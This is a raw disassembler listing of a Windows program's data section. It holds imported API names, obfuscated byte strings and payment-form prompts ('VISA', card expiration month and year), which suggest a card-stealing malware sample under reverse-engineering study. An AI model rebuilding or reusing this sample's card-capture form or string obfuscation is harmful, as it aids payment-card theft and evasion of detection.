dword_44B8FC dd 47DD0000h, 61626F4Ch, 6D654D6Ch, 5379726Fh, 75746174h
; DATA XREF: sub_442373+189�o
db 73h, 0
word_44B912 dw 0 ; DATA XREF: sub_442373+16D�o
aRmultibytetowi db 'rMultiByteToWideChar',0
byte_44B929 db 2 dup(0), 0C2h ; DATA XREF: sub_442373+151�o
aWidechartomult db 'WideCharToMultiByte',0
dword_44B940 dd 575B0000h, 78456E69h ; DATA XREF: sub_442373+135�o
db 65h, 63h, 0
byte_44B94B db 0 ; DATA XREF: sub_442373+119�o
dd 736C1000h, 656C7274h
db 6Eh, 57h, 0
byte_44B957 db 0 ; DATA XREF: sub_442373+FD�o
dd 6547A500h, 6C694674h, 7A695365h
db 65h, 0
word_44B966 dw 0 ; DATA XREF: sub_442373+E1�o
aGclosehandle db 'CloseHandle',0
byte_44B975 db 2 dup(0), 0CFh ; DATA XREF: sub_442373+C5�o
aWritefile db 'WriteFile',0
word_44B982 dw 0 ; DATA XREF: sub_442373+A9�o
aVsetfilepointe db 'SetFilePointer',0
dword_44B994 dd 44410000h, 74656C65h, 6C694665h ; DATA XREF: sub_442373+8D�o
db 65h, 41h, 0
byte_44B9A3 db 0 ; DATA XREF: sub_442373+71�o
dd 7243F500h, 65746165h, 656C6946h
db 41h, 0
word_44B9B2 dw 0 ; DATA XREF: sub_442373+55�o
aZloadlibrarya db 'zLoadLibraryA',0
word_44B9C2 dw 0 ; DATA XREF: sub_442373+39�o
a5getmodulehand db '5GetModuleHandleA',0
word_44B9D6 dw 0 ; DATA XREF: sub_442373+1D�o
aBeep db 'Beep',0
word_44B9DE dw 0 ; DATA XREF: sub_442373+1�o
aRexitthread db 'rExitThread',0
dword_44B9EC dd 11340017h, 11571157h, 19571157h, 2 dup(57115711h), 571A5711h
; DATA XREF: sub_442143:loc_44232A�o
db 5Bh, 59h, 0
byte_44BA07 db 16h ; DATA XREF: sub_442143+1A1�o
dd 0F5B39600h, 2 dup(0F5B3F5B3h), 0B3F5B3BBh, 0B3F5B3F5h
dd 0E3E4B8F5h
db 0
byte_44BA21 db 1, 0, 98h ; DATA XREF: sub_441E11+30B�o
db 0BBh, 0
word_44BA26 dw 1 ; DATA XREF: sub_441E11+2B5�o
db 0C7h, 0E4h, 0
byte_44BA2B db 1 ; DATA XREF: sub_441E11+23F�o
dd 8EAD00h
dword_44BA30 dd 0E0880007h, 0B2F8FCFCh ; DATA XREF: sub_441E11+21B�o
db 2 dup(0A7h), 0
byte_44BA3B db 1 ; DATA XREF: sub_441E11+1DB�o
dd 8CAF00h
dword_44BA40 dd 0F39B0007h, 0A1EBEFEFh ; DATA XREF: sub_441E11:loc_441F45�o
db 2 dup(0B4h), 0
byte_44BA4B db 2Bh ; DATA XREF: sub_441E11+10�o
dd 8982E104h, 84898284h, 8493918Fh, 88CF9292h, 0C28E878Fh
dd 858D8E86h, 8D8D8E91h, 8C8E82CFh, 958F88C2h, 858D8E86h
dd 8C8E82CFh, 969696C2h, 938382CFh, 0C29493CFh, 0CF969696h
dd 8A828E92h, 8280CF92h, 8E9592C2h, 80918C93h, 8E82CF98h
dd 9382C28Ch, 918E9594h, 0C2948FCFh, 0CF96848Fh, 0CF868684h
dd 0C28C8E82h, 0CF969696h, 9B8F8E91h, 80829288h, 82CF928Ch
dd 96C28C8Eh, 8E828D84h, 0CFD2848Ch, 8D888C92h, 8E82CF84h
dd 0C28A94CFh, 0D3838D8Eh, 95808FCFh, 848F8E88h, 8E82CF95h
dd 9696C28Ch, 8383CF96h, 93CF8F88h, 808CC294h, 93849592h
dd 82CF99CCh, 96C28C8Eh, 91CF9696h, 889B8F8Eh, 8C808292h
dd 8E82CF92h, 9696C28Ch, 8083CF96h, 83CC8A8Fh, 94908F80h
dd 8082CC84h, 8085808Fh, 0C28082CFh, 0CF969696h, 9B8F8E91h
dd 80829288h, 82CF928Ch, 96C28C8Eh, 83CF9696h, 82CF8E8Ch
dd 91C28C8Eh, 80919880h, 8E82CF8Dh, 8384C28Ch, 82CF9880h
dd 96C28C8Eh, 83CF9696h, 8E8A8F80h, 85808C87h, 0CF809394h
dd 0C28C8E82h, 0CF969696h, 82838882h, 8C8E82CFh, 969696C2h
dd 839597CFh, 0C29493CFh, 0CF969696h, 80839682h, 82CF8A8Fh
dd 86C28C8Eh, 91858D8Eh, 0CF8D8D8Eh, 0C28C8E82h, 0CF969696h
dd 9B8F8E91h, 80829288h, 82CF928Ch, 96C28C8Eh, 8CCF9696h
dd 8F80838Ch, 9493CF8Ah, 969696C2h, 888F94CFh, 93959280h
dd 93CF8C94h, 8E86C294h, 8E91858Dh, 82CF8D8Dh, 96C28C8Eh
dd 91CF9696h, 889B8F8Eh, 8C808292h, 8E82CF92h, 9696C28Ch
dd 8E96CF96h, 83858D93h, 0CF8A8F80h, 0C286938Eh, 0CF969696h
dd 858F8082h, 95808588h, 93849784h, 84888788h, 8E82CF93h
dd 9696C28Ch, 8E91CF96h, 92889B8Fh, 928C8082h, 8C8E82CFh
dd 969696C2h, 8F8083CFh, 88878E8Ah, 8088858Fh, 8C8E82CFh
dd 969696C2h, 838288CFh, 0CF8A8F80h, 83C29493h, 888A8F80h
dd 89CF868Fh, 87888D80h, 8ECC9980h, 8F888D8Fh, 8E82CF84h
dd 0C28A94CFh, 0CF969696h, 858F8497h, 8F92938Eh, 0CF848C80h
dd 96C29296h, 8ACF9696h, 93CF838Ch, 9696C294h, 848FCF96h
dd 86808C95h, 84959288h, 8E82CF93h, 808AC28Ch, 9B808A97h
dd 958F8482h, 82CF9384h, 96C28C8Eh, 97CF9696h, 8E858F84h
dd 808F9293h, 96CF848Ch, 988CC292h, 888D8F8Eh, 8280848Fh
dd 8F948E82h, 0CFD39295h, 84838380h, 95808F98h, 808F8E88h
dd 8E82CF8Dh, 0C28A94CFh, 888D8F8Eh, 83CC848Fh, 8F889294h
dd 0CF929284h, 988E8D8Dh, 92959285h, 8E82CF83h, 0C28A94CFh
dd 0CF969696h, 808D8D80h, 80838089h, 8F808385h, 8E82CF8Ah
dd 9696C28Ch, 8393CF96h, 8E82CF82h, 9696C28Ch, 8E91CF96h
dd 92889B8Fh, 928C8082h, 8C8E82CFh, 969696C2h, 9289CFD0h
dd 82CF8283h, 868AC280h, 8D849383h, 8D829980h, 93CF8394h
dd 8098C294h, 0CF8E838Ch, 0C29B8883h, 8E85888Ah, 8083CC92h
dd 93CF8A8Fh, 9696C294h, 838DCF96h, 93888582h, 0CF958284h
dd 9394808Dh, 88958F84h, 80838F80h, 82CF8A8Fh, 8083C280h
dd 808D8293h, 82CF9298h, 95C28C8Eh, 8D80958Eh, 9387988Dh
dd 80838484h, 8F888A8Fh, 8E82CF86h, 9696C28Ch, 838FCF96h
dd 8082CF82h, 83D2D4C2h, 0CF8A8F80h, 0C28C8E82h, 0CF969696h
dd 858F8497h, 8F92938Eh, 0CF848C80h, 96C29296h, 83CF9696h
dd 95CC83D3h, 95929493h, 8C8E82CFh, 969696C2h, 8F8497CFh
dd 92938E85h, 848C808Fh, 0C29296CFh, 8F84918Eh, 8A8F8083h
dd 8C8E82CFh, 958095C2h, 87848FCCh, 8F808395h, 9493CF8Ah
dd 828492C2h, 0CF83808Dh, 92C29493h, 93948284h, 8D989588h
dd 93CF8380h, 8487C294h, 93808995h, 8883CF85h, 9386C29Bh
dd 91998F8Eh, 848F808Dh, 93CF9295h, 8497C294h, 938E858Fh
dd 8C808F92h, 9296CF84h
db 0C2h, 0
word_44BE7A dw 0 ; DATA XREF: sub_441D52+6B�o
aRegclosekey_0 db 'RegCloseKey',0
byte_44BE89 db 2 dup(0), 0B8h ; DATA XREF: sub_441D52+4F�o
aRegqueryvaluee db 'RegQueryValueExA',0
byte_44BE9D db 2 dup(0), 7Bh ; DATA XREF: sub_441D52:loc_441D85�o
aRegopenkeyexa db 'RegOpenKeyExA',0
word_44BEAE dw 0Ch ; DATA XREF: sub_441D52+1C�o
dd 0E6F4F190h, 0A3F9E0F1h, 0FCF4BEA2h
db 0FCh, 0
word_44BEBE dw 0 ; DATA XREF: sub_441D52+1�o
aAdvapi32_dll_0 db 'advapi32.dll',0
word_44BECE dw 4 ; DATA XREF: sub_441CEA+1C�o
dd 0F3AAECC9h
db 95h, 0
word_44BED6 dw 0 ; DATA XREF: sub_441C26+A3�o
aDispgetparam db 'DispGetParam',0
word_44BEE6 dw 0 ; DATA XREF: sub_441C26+87�o
aVariantinit db 27h,'VariantInit',0
byte_44BEF5 db 2 dup(0), 9 ; DATA XREF: sub_441C26+6B�o
aVariantclear db 'VariantClear',0
byte_44BF05 db 2 dup(0), 2Fh ; DATA XREF: sub_441C26+4F�o
aSysfreestring db 'SysFreeString',0
word_44BF16 dw 0 ; DATA XREF: sub_441C26:loc_441C59�o
aIsysallocstrin db 'SysAllocString',0
dword_44BF28 dd 6F610000h, 7561656Ch, 2E323374h, 6C6C64h ; DATA XREF: sub_441C26+1C�o
dword_44BF38 dd 6FF50000h, 7561656Ch, 2E323374h, 6C6C64h ; DATA XREF: sub_441C26+1�o
dword_44BF48 dd 45A20000h, 446D756Eh, 746B7365h, 6957706Fh, 776F646Eh
; DATA XREF: sub_4418ED+2EF�o
db 73h, 0
word_44BF5E dw 0 ; DATA XREF: sub_4418ED+2D3�o
aFindwindowexa db 27h,'FindWindowExA',0
byte_44BF6F db 0 ; DATA XREF: sub_4418ED+2B7�o
dd 72547F00h, 6C736E61h, 4D657461h, 61737365h
db 67h, 65h, 0
byte_44BF83 db 0 ; DATA XREF: sub_4418ED+29B�o
dd 68537600h, 6957776Fh, 776F646Eh
db 0
byte_44BF91 db 2 dup(0), 32h ; DATA XREF: sub_4418ED+27F�o
aSetwindowtexta db 'SetWindowTextA',0
byte_44BFA3 db 0 ; DATA XREF: sub_4418ED+263�o
dd 65530A00h, 6E695774h, 4C776F64h, 41676E6Fh
db 0
byte_44BFB5 db 2 dup(0), 20h ; DATA XREF: sub_4418ED+247�o
aSettimer db 'SetTimer',0
byte_44BFC1 db 2 dup(0), 73h ; DATA XREF: sub_4418ED+22B�o
aSetfocus db 'SetFocus',0
byte_44BFCD db 2 dup(0), 4Dh ; DATA XREF: sub_4418ED+20F�o
aSendmessagea db 'SendMessageA',0
byte_44BFDD db 2 dup(0), 80h ; DATA XREF: sub_4418ED+1F3�o
aRegisterclassa db 'RegisterClassA',0
byte_44BFEF db 0 ; DATA XREF: sub_4418ED+1D7�o
dd 6F4D1100h, 69576576h, 776F646Eh
db 0
byte_44BFFD db 2 dup(0), 0D3h ; DATA XREF: sub_4418ED+1BB�o
aMessageboxa_0 db 'MessageBoxA',0
dword_44C00C dd 4C680000h, 4964616Fh, 416E6F63h ; DATA XREF: sub_4418ED+19F�o
db 0
byte_44C019 db 2 dup(0), 76h ; DATA XREF: sub_4418ED+183�o
aLoadcursora db 'LoadCursorA',0
dword_44C028 dd 47800000h, 69577465h, 776F646Eh, 74786554h ; DATA XREF: sub_4418ED+167�o
db 41h, 0
word_44C03A dw 0 ; DATA XREF: sub_4418ED+14B�o
aGetwindowrect db 'GetWindowRect',0
byte_44C04B db 0 ; DATA XREF: sub_4418ED+12F�o
dd 65475200h, 6E695774h, 4C776F64h, 41676E6Fh
db 0
byte_44C05D db 2 dup(0), 0BCh ; DATA XREF: sub_4418ED+113�o
aGetwindow db 'GetWindow',0
word_44C06A dw 0 ; DATA XREF: sub_4418ED+F7�o
aGetmessagea db 'GetMessageA',0
byte_44C079 db 2 dup(0), 98h ; DATA XREF: sub_4418ED+DB�o
aGetforegroundw db 'GetForegroundWindow',0
dword_44C090 dd 47A00000h, 6C437465h, 4E737361h, 41656D61h ; DATA XREF: sub_4418ED+BF�o
db 0
byte_44C0A1 db 2 dup(0), 67h ; DATA XREF: sub_4418ED+A3�o
aDispatchmessag db 'DispatchMessageA',0
byte_44C0B5 db 2 dup(0), 63h ; DATA XREF: sub_4418ED+87�o
aDestroywindow db 'DestroyWindow',0
word_44C0C6 dw 0 ; DATA XREF: sub_4418ED+6B�o
aDefwindowproca db ')DefWindowProcA',0
dword_44C0D8 dd 43870000h, 74616572h, 6E695765h, 45776F64h ; DATA XREF: sub_4418ED+4F�o
db 78h, 41h, 0
byte_44C0EB db 0 ; DATA XREF: sub_4418ED:loc_441920�o
dd 6143F400h, 69576C6Ch, 776F646Eh, 636F7250h
db 41h, 0
word_44C0FE dw 0Ah ; DATA XREF: sub_4418ED+1C�o
a@532srn db '@53%2srn$,,',0
dword_44C10C dd 75600000h, 33726573h, 6C642E32h ; DATA XREF: sub_4418ED+1�o
db 6Ch, 0
word_44C11A dw 3 ; DATA XREF: sub_44118A+2F9�o
aNcR db '',0
byte_44C121 db 4, 0, 0D1h ; DATA XREF: sub_44118A:loc_4413F6�o
aV db 'ꢾ',0
byte_44C129 db 4, 0, 0F4h ; DATA XREF: sub_44118A+22B�o
aR db 'ϐ',0
align 4
dword_44C134 dd 3, 4004Dh, 0A0000h ; DATA XREF: sub_44118A+16�o
db 2 dup(0)
aSS_0 db '%s\%s',0 ; DATA XREF: sub_440E84+25B�o
; sub_440E84+2C3�o
dword_44C148 dd 0C2E70004h, 0CDBB94h ; DATA XREF: sub_440E84+17�o
byte_44C150 db 2Ah, 0 ; DATA XREF: sub_440C54+1D3�o
word_44C152 dw 4 ; DATA XREF: sub_440C54+9D�o
aImiii db '',0
asc_44C15A db 9,0 ; DATA XREF: sub_440A86+167�o
dd 312C0E5Eh, 2A3D2B3Ah
db 17h, 3Ah, 0
byte_44C167 db 29h ; DATA XREF: sub_440A86+157�o
dd 322E7D00h, 3C2A293Bh, 3021382Fh, 120F1E14h, 91B120Eh
dd 13142A21h, 0E0A1219h, 0F083E21h, 913180Fh, 0E0F182Bh
dd 131214h
dword_44C194 dd 755B0001h ; DATA XREF: sub_440A86+13B�o
db 0
byte_44C199 db 4, 0, 7Ah ; DATA XREF: sub_440A86+E1�o
aW_T db 'W_"T',0
byte_44C1A1 db 3, 0, 0C0h ; DATA XREF: sub_440A86+9C�o
dd 9CFAA3h
dword_44C1A8 dd 0F0D50008h, 0A0F0FBA0h, 0A0F0FBh ; DATA XREF: sub_440A86:loc_440AEA�o
dword_44C1B4 dd 3A740002h ; DATA XREF: sub_440A86+4F�o
db 20h, 0
word_44C1BA dw 2 ; DATA XREF: sub_440A86+31�o
dd 45241Dh
dword_44C1C0 dd 49400000h, 75714573h, 55476C61h ; DATA XREF: sub_4408F1+A3�o
db 49h, 44h, 0
byte_44C1CF db 0 ; DATA XREF: sub_4408F1+87�o
dd 6F434800h, 6E696E55h, 61697469h, 657A696Ch
db 0
byte_44C1E1 db 2 dup(0), 0E4h ; DATA XREF: sub_4408F1+6B�o
aCoinitialize db 'CoInitialize',0
byte_44C1F1 db 2 dup(0), 6Dh ; DATA XREF: sub_4408F1+4F�o
aCocreateinstan db 'CoCreateInstance',0
byte_44C205 db 2 dup(0), 0F6h ; DATA XREF: sub_4408F1:loc_440924�o
aClsidfromstrin db 'CLSIDFromString',0
dword_44C218 dd 6FB90000h, 3233656Ch, 6C6C642Eh ; DATA XREF: sub_4408F1+1C�o
db 0
byte_44C225 db 2 dup(0), 0C8h ; DATA XREF: sub_4408F1+1�o
aOle32_dll db 'ole32.dll',0
word_44C232 dw 0 ; DATA XREF: sub_440516:loc_4407A0�o
dd 5CD8h
dword_44C238 dd 9, 6F000Dh, 6B0068h, 7F0062h, 480068h, 690063h
; DATA XREF: sub_4402F1+1C3�o
db 2 dup(0)
word_44C252 dw 5Ah ; DATA XREF: sub_4402F1+125�o
dd 0F2F6A39Fh, 0F6E8BFF8h, 0A2F7EBFBh, 0FAF7BFAFh, 0EBF7F8F6h
dd 0FDBFAFA2h, 0FAFBEDF0h, 0BFAFA2EDh, 0A2FCEDECh, 0EFEBEBF7h
dd 0BAB0B0A5h, 0A2F7A0ECh, 0F6B9ECBAh, 0BAEABAA2h, 0A2F0B9ECh
dd 0F9B9EABAh, 0B9FCBAA2h, 0BAA2F6ECh, 0F0ECB9ECh, 0B9EABAA2h
dd 0BAA2F3EBh, 0A2FBB9EAh, 0A1ECBAh
unk_44C2B0 db 2Ch ; , ; DATA XREF: sub_4402F1+CE�o
align 2
aVj?1v?2Kfv3?1K db 'Vj?;1v!?2">kfv>3?1>"kfv49$23$kfv%$5ks%yi0ks5h',0
asc_44C2E0 db 7,0 ; DATA XREF: sub_4402F1+69�o
dw 0A29Eh
dd 0B1A2A0FCh
db 0FCh, 0A0h, 0
byte_44C2EB db 0 ; DATA XREF: sub_440281+4F�o
dd 6547D600h, 6F745374h, 624F6B63h, 7463656Ah
db 0
byte_44C2FD db 2 dup(0), 50h ; DATA XREF: sub_440281:loc_4402B4�o
aCreatefonta db 'CreateFontA',0
asc_44C30C db 9,0 ; DATA XREF: sub_440281+1C�o
aPAb db 'Ɯ',0
byte_44C319 db 2 dup(0), 35h ; DATA XREF: sub_440281+1�o
aGdi32_dll db 'gdi32.dll',0
word_44C326 dw 0 ; DATA XREF: sub_44017A+28�o
aSkkqVx db 'Skkq-vx',0
dword_44C330 dd 25430000h, 746D5F73h, 752578h ; DATA XREF: sub_44017A:loc_440192�o
dword_44C33C dd 53A60000h, 73496366h, 656C6946h, 746F7250h, 65746365h
; DATA XREF: sub_4400F6+3C�o
db 64h, 0
word_44C352 dw 0 ; DATA XREF: sub_4400F6+1C�o
dd 6366731Dh, 6C6C642Eh
db 0
byte_44C35D db 2 dup(0), 3Bh ; DATA XREF: sub_4400F6+1�o
aSfc_dll db 'sfc.dll',0
unk_44C368 db 0 ; DATA XREF: sub_43FF3C:loc_43FF6F�o
align 2
aShgetfolderpat db '<SHGetFolderPathA',0
dword_44C37C dd 73810000h, 6C6C6568h, 642E3233h ; DATA XREF: sub_43FF3C+1C�o
db 2 dup(6Ch), 0
byte_44C38B db 0 ; DATA XREF: sub_43FF3C+1�o
dd 68731300h, 336C6C65h, 6C642E32h
db 6Ch, 0
word_44C39A dw 0 ; DATA XREF: sub_43F7D6:loc_43F838�o
db 86h, 0
word_44C39E dw 0 ; DATA XREF: sub_43F616+19F�o
aDstrcpy db 'Dstrcpy',0
dword_44C3A8 dd 76F70000h, 69727073h, 66746Eh ; DATA XREF: sub_43F616+183�o
dword_44C3B4 dd 736D0000h, 6E697270h ; DATA XREF: sub_43F616+167�o
db 74h, 66h, 0
byte_44C3BF db 0 ; DATA XREF: sub_43F616+14B�o
dd 74739C00h, 74616372h
db 0
byte_44C3C9 db 2 dup(0), 0F6h ; DATA XREF: sub_43F616+12F�o
aSrand db 'srand',0
word_44C3D2 dw 0 ; DATA XREF: sub_43F616+113�o
aArand db 'Arand',0
word_44C3DA dw 0 ; DATA XREF: sub_43F616+F7�o
aImemset db 'memset',0
dword_44C3E4 dd 6D6C0000h, 70636D65h ; DATA XREF: sub_43F616+DB�o
db 79h, 0
word_44C3EE dw 0 ; DATA XREF: sub_43F616+BF�o
aMemcmp db 0Bh,'memcmp',0
dword_44C3F8 dd 6D350000h, 6F6C6C61h ; DATA XREF: sub_43F616+A3�o
db 63h, 0
word_44C402 dw 0 ; DATA XREF: sub_43F616+87�o
aEfree db 'free',0
word_44C40A dw 0 ; DATA XREF: sub_43F616+6B�o
aGatoi db 'gatoi',0
word_44C412 dw 0 ; DATA XREF: sub_43F616+4F�o
aToupper db 'toupper',0
byte_44C41D db 2 dup(0), 60h ; DATA XREF: sub_43F616:loc_43F649�o
a_sleep db '_sleep',0
byte_44C427 db 0 ; DATA XREF: sub_43F616+1C�o
dd 72632C00h, 6C6C6474h, 6C6C642Eh
db 0
byte_44C435 db 2 dup(0), 7Bh ; DATA XREF: sub_43F616+1�o
aCrtdll_dll db 'crtdll.dll',0
byte_44C443 db 0 ; DATA XREF: sub_43F328+181�o
dd 6B6B1600h, 78762D71h
db 0
byte_44C44D db 2 dup(0), 0DAh ; DATA XREF: sub_43F328+171�o
aKkqVx_0 db 'kkq-vx',0
byte_44C457 db 0 ; DATA XREF: sub_43F328+F0�o
dd 6B6B6300h, 78762D71h
db 0
byte_44C461 db 2 dup(0), 7 ; DATA XREF: sub_43F328+A6�o
aKkqVx_1 db 'kkq-vx',0
byte_44C46B db 0 ; DATA XREF: sub_43F328:loc_43F3BE�o
dd 73252B00h, 78746D5Fh
db 25h, 75h, 0
aClickOnceToCon db 'Click Once To Continue',0 ; DATA XREF: sub_43E2B0+DB3�o
aButton db 'BUTTON',0 ; DATA XREF: sub_43E2B0+DB8�o
byte_44C495 db 1Eh, 0, 8Fh ; DATA XREF: sub_43E2B0+C9D�o
aPEeePP db 'ʅ¯',0
byte_44C4B7 db 6 ; DATA XREF: sub_43E2B0+C8D�o
dd 7005300h, 101A0712h
db 0
aEdit db 'EDIT',0 ; DATA XREF: sub_43E2B0+C40�o
word_44C4C6 dw 6 ; DATA XREF: sub_43E2B0+B5C�o
aVrtzmr db '',0
dword_44C4D0 dd 54710004h, 4435Fh ; DATA XREF: sub_43E2B0:loc_43EDBD�o
byte_44C4D8 db 0 ; DATA XREF: sub_43E2B0+A45�o
; sub_43E2B0+ACE�o ...
aCombobox db 'COMBOBOX',0 ; DATA XREF: sub_43E2B0+A4A�o
; sub_43E2B0+AD3�o
word_44C4E2 dw 6 ; DATA XREF: sub_43E2B0+8D7�o
aIIBl db 'ț',0
aN db 'n',0 ; DATA XREF: sub_43E2B0:loc_43EB61�o
dw 0E3B6h
dd 0DAD4D7D8h, 0D9C296D3h, 0C2C3D796h, 0DFC4D9DEh, 0BC98D3CCh
dd 0C696C593h, 0D3D5D9C4h, 0D8DFC5C5h, 0D3D596D1h, 0C4D3C2D8h
dd 96C5DF96h, 0D4D7D8C3h, 0C296D3DAh, 0C3D796D9h, 0C4D9DEC2h
dd 96D3CCDFh, 0C4C3D9CFh, 0C4D7D596h, 0C59396D2h, 0D7FBBC98h
dd 0D596D3DDh, 0D3C4C4D9h, 0D9DFC2D5h, 0D796C5D8h, 0C296D2D8h
dd 0D796CFC4h, 0D8DFD7D1h
db 98h, 0
word_44C55E dw 0Ah ; DATA XREF: sub_43E2B0:loc_43EB49�o
dd 7D6F430Eh, 4D7C6B7Ah, 6A7C6Fh
aVisa db 'VISA',0 ; DATA XREF: sub_43E2B0+886�o
asc_44C571 db ' ',0 ; DATA XREF: sub_43E2B0+836�o
aStatic db 'STATIC',0 ; DATA XREF: sub_43E2B0+83B�o
word_44C57A dw 0 ; DATA XREF: sub_43E2B0+6A6�o
db 0AAh, 0
word_44C57E dw 6 ; DATA XREF: sub_43E2B0+696�o
a0cdqdys db '0cdqdys',0
dword_44C588 dd 3A300015h, 60101010h, 75737F62h, 7E796363h, 71761077h
; DATA XREF: sub_43E2B0+615�o
dd 74757C79h
db 0
byte_44C5A1 db 6, 0, 0B0h ; DATA XREF: sub_43E2B0+605�o
dd 0E4F1E4E3h
db 0F9h, 0F3h, 0
aKkqVx db 'kkq-vx',0 ; DATA XREF: sub_43E2B0+554�o
aExplorer db 'Explorer',0 ; DATA XREF: sub_43E2B0+49C�o
asc_44C5BB db 9,0 ; DATA XREF: sub_43E2B0:loc_43E730�o
aPiR db '',0
dword_44C5C8 dd 0BDE9000Eh, 80BE8B88h, 9E868D87h, 9A8885AAh ; DATA XREF: sub_43E2B0+454�o
db 9Ah, 0
word_44C5DA dw 4 ; DATA XREF: sub_43E013+55�o
aBl_1 db 'Bl,.1',0
word_44C5E2 dw 1 ; DATA XREF: sub_43E013+29�o
db 96h, 0CAh, 0
byte_44C5E7 db 0Fh ; DATA XREF: sub_43D966+4E�o
dd 92C4E100h, 8D8785BDh, 0D29B94C4h, 8D85CFD3h
db 8Dh, 0
word_44C5FA dw 0Fh ; DATA XREF: sub_43D966+1D�o
dd 0D8F7A184h, 0F1A1E2EFh, 0B6B7FEE8h, 0E8E8E0AAh
db 0
byte_44C60D db 2 dup(0), 4Ch ; DATA XREF: sub_43D2F7:loc_43D558�o
db 0
byte_44C611 db 1, 0, 74h ; DATA XREF: sub_43D2F7:loc_43D4E3�o
db 0Ch, 0
word_44C616 dw 1 ; DATA XREF: sub_43CBF8:loc_43D102�o
db 1Bh, 3Bh, 0
byte_44C61B db 0 ; DATA XREF: sub_43CBF8+4C1�o
db 0, 0A9h, 0
byte_44C61F db 13h ; DATA XREF: sub_43CBF8+496�o
dd 3A015400h, 31383635h, 743B2074h, 3C202135h, 2E3D263Bh
db 31h, 0
word_44C636 dw 35h ; DATA XREF: sub_43CBF8+486�o
dd 111E2570h, 50151C12h, 11501F04h, 1F180405h, 150A1902h
dd 39505D50h, 223F333Eh, 24333522h, 3E392050h, 1C20505Eh
dd 15031115h, 1F13505Ch, 13150202h
db 4, 5Eh, 0
byte_44C66F db 1 ; DATA XREF: sub_43CBF8:loc_43CEB7�o
dd 96BB00h
aPleaseSelect_0 db 'Please, select Expiration Year',0 ; DATA XREF: sub_43CBF8+293�o
byte_44C693 db 1 ; DATA XREF: sub_43CBF8:loc_43CE06�o
dd 694900h
aPleaseSelectEx db 'Please, select Expiration Month',0 ; DATA XREF: sub_43CBF8+1E2�o
dword_44C6B8 dd 773E0011h, 4C5B4A50h, 1E4A5B50h, 524E467Bh, 4C5B4C51h
; DATA XREF: sub_43C941+25�o
db 0
byte_44C6CD db 0Ah, 0, 0ABh ; DATA XREF: sub_43C8E3+1C�o
dd 0F4C8CDD8h, 0CF85D8C4h
db 2 dup(0C7h), 0
byte_44C6DB db 0 ; DATA XREF: sub_43C8E3+1�o
dd 6673E300h, 736F5F63h, 6C6C642Eh
db 0
byte_44C6E9 db 2, 0, 0B0h ; DATA XREF: sub_43C520+111�o
db 2 dup(90h), 0
byte_44C6EF db 1 ; DATA XREF: sub_43C520+D3�o
dd 0F8D700h
dword_44C6F4 dd 8650012h, 9110616h, 11163A16h, 16101104h, 56170407h
; DATA XREF: sub_43C520:loc_43C552�o
db 57h, 0
word_44C70A dw 0Eh ; DATA XREF: sub_43C520+10�o
dd 75764317h, 73797E40h, 7B546078h, 646476h
dword_44C71C dd 74510004h, 9637Fh ; DATA XREF: sub_43C480+6A�o
dword_44C724 dd 0BA9F0001h ; DATA XREF: sub_43C480:loc_43C4D8�o
db 0
byte_44C729 db 25h, 63h, 0 ; DATA XREF: sub_43C480+44�o
dword_44C72C dd 5C970000h ; DATA XREF: sub_43C2E5+38�o
db 0
aSS db '%s%s\',0 ; DATA XREF: sub_43BF7B+29D�o
; sub_43BF7B+301�o
byte_44C737 db 0 ; DATA XREF: sub_43BF7B+BA�o
dd 7325B400h
db 2Ah, 0
word_44C73E dw 4 ; DATA XREF: sub_43BF7B+6D�o
dd 570E486Dh
db 31h, 0
word_44C746 dw 4 ; DATA XREF: sub_43BAE4+3E9�o
dd 0BFBAF0DEh
db 0AAh, 0
word_44C74E dw 4 ; DATA XREF: sub_43B609+55�o
dd 14165678h
db 0Bh, 0
word_44C756 dw 1 ; DATA XREF: sub_43B609+29�o
db 78h, 24h, 0
byte_44C75B db 4 ; DATA XREF: sub_43B4DD+55�o
dd 93D3FD00h
db 91h, 8Eh, 0
byte_44C763 db 1 ; DATA XREF: sub_43B4DD+29�o
dd 0A0FC00h
dword_44C768 dd 15690001h ; DATA XREF: sub_43A503+D36�o
db 0
byte_44C76D db 20h, 7Ch, 0 ; DATA XREF: sub_43A503+D10�o
dword_44C770 dd 28120001h ; DATA XREF: sub_43A503+C85�o
db 0
byte_44C775 db 4, 0, 0DFh ; DATA XREF: sub_43A503:loc_43B142�o
dd 0E5AAFAFFh
db 0
byte_44C77D db 1, 0, 2Ah ; DATA XREF: sub_43A503+6D8�o
db 56h, 0
word_44C782 dw 0Ah ; DATA XREF: sub_43A503+49C�o
dd 2B514D6Dh, 57203F22h, 531848h
dword_44C790 dd 1434000Bh, 75667208h, 110E7179h ; DATA XREF: sub_43A503:loc_43A89E�o
db 41h, 0Ah, 0
byte_44C79F db 0Ah ; DATA XREF: sub_43A503+2A4�o
dd 0E1FDDD00h, 909C8F9Bh, 0E390E798h, 0
dword_44C7B0 dd 4, 0D500BBh, 0D600DAh, 0DEh ; DATA XREF: sub_43A503+230�o
dword_44C7C0 dd 5, 0EF0099h, 0F500F8h, 0FC00ECh ; DATA XREF: sub_43A503+219�o
db 2 dup(0)
word_44C7D2 dw 4 ; DATA XREF: sub_43A324+39�o
dd 0F8A1E7C2h
db 9Eh, 0
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: .data:off_44B17C�o
db '://',0
align 10h
dword_44C820 dd 9BA05972h, 11CFF6A8h, 0A00042A4h, 398F0AC9h ; DATA XREF: sub_43C6BA+4C�o
dword_44C830 dd 0FE4106E0h, 11D0399Ah, 0A0008CA4h, 398F0AC9h ; DATA XREF: sub_43C6BA+1CC�o
; sub_43C6BA+1EB�o ...
dword_44C840 dd 34A715A0h, 11D06587h, 20004A92h, 4DACC7AFh ; DATA XREF: sub_43C6BA+141�o
; sub_43C6BA+170�o ...
dword_44C850 dd 3050F25Bh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h
; DATA XREF: sub_43DB9F:loc_43DBEB�o
dword_44C860 dd 0B196B284h, 101ABAB4h, 0AA009CB6h, 71D3400h ; DATA XREF: sub_43C9CE+19�o
dword_44C870 dd 20400h, 0 ; DATA XREF: sub_43DB9F:loc_43DBCB�o
; sub_44186A:loc_441896�o ...
dd 0C0h, 46000000h
dword_44C880 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43A503+187�o
; sub_43FA07+156�o
dword_44C890 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43A503+4DF�o
; sub_43A503+AD0�o ...
